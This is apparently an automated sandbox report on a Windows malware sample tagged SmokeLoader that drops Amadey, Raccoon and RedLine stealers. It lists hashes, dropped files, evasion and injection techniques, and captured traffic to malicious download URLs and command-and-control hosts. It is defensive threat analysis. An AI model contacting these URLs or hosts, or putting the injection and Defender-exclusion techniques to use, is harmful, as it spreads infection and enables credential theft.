Windows Analysis Report F7E3DjYJpC.exe

Overview

General Information

Sample Name: F7E3DjYJpC.exe
Analysis ID: 511974
MD5: 537ad79dd97c59fcd1df5d8a26256192
SHA1: 7d43f8a6c25934e4299316ad7c9c8e8ce61416e3
SHA256: 17bb183c9e8f262c2bd91228e788f4613279c795573b558c3981501ee02811ba
Tags: Dofoil, exe, SmokeLoader
Detection

Amadey Raccoon RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Early bird code injection technique detected
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
DLL reload attack detected
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://telegalive.top/T# Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe Avira URL Cloud: Label: malware
Source: http://telegalive.top/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Multi AV Scanner detection for submitted file
Source: F7E3DjYJpC.exe Virustotal: Detection: 28%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\20BD.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\3C84.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\3D90.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\46D6.exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\69B.exe ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: F7E3DjYJpC.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\iwbavbe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5483.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2CF4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\16BC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\39A7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1254.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\69B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ssbavbe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\abbavbe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3D90.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 13.0.iwbavbe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.5.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 26.0.31F4.exe.400000.7.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 13.0.iwbavbe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.iwbavbe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.13.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 26.0.31F4.exe.400000.17.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 32.0.iwbavbe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.15.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 32.0.iwbavbe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.iwbavbe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.iwbavbe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.9.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 4.0.F7E3DjYJpC.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.11.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 13.0.iwbavbe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49841 version: TLS 1.0
Uses 32bit PE files
Source: F7E3DjYJpC.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: 20BD.exe, 00000014.00000002.863191806.0000000000417000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 31F4.exe, 00000016.00000002.938495921.0000000003625000.00000004.00000001.sdmp, 31F4.exe, 0000001A.00000000.887030697.0000000000400000.00000040.00000001.sdmp, 31F4.exe, 00000024.00000000.938689458.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.851564916.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp
Source: Binary string: c C:\rudiletama-43\bano.pdbp source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 20BD.exe, 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: 20BD.exe
Source: Binary string: C:\rudiletama-43\bano.pdb source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source: Binary string: NC:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then add dword ptr [ebp-5Ch], 01h 23_2_01140520
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then jmp 0114100Dh 23_2_01140DD0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 23_2_011491D8
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 23_2_011491CC
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then jmp 0114100Dh 23_2_01140DC0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49865 -> 91.219.236.97:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 185.215.113.45:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 185.215.113.45:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:49:30 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:49:02 GMTETag: "54600-5cf8247e1cc68"Accept-Ranges: bytesContent-Length: 345600Connection: closeContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:50:10 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:50:02 GMTETag: "92a00-5cf824b80192b"Accept-Ranges: bytesContent-Length: 600576Connection: closeContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:50:40 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:50:44 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 18:50:02 GMTETag: "d6000-5cf824b7e7878"Accept-Ranges: bytesContent-Length: 876544Connection: closeContent-Type: application/octet-stream
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49841 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jaqhuuufk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhnqxhhk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uktwknfaq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fnyhcr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kejrjwxwy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wijjlglvpi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chbebm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foxbbmduqm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uneqpmoi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iakfv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbocfb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnalq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qflbfkys.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyhduujjq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yetpvqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkbenmco.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpjsnfgtc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkmns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwvrimo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfnisufi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xoynqlbjnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwytsoqpb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipaup.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etkxss.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://shpjiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmbmyysgg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hpmdwx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmmge.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fexsjalrxu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xxlvxgkbvo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfxffaryp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blprmuxml.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkemri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uereap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://muywwft.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfayr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sivhm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwebveg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lsmjboth.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: hajezey1.top
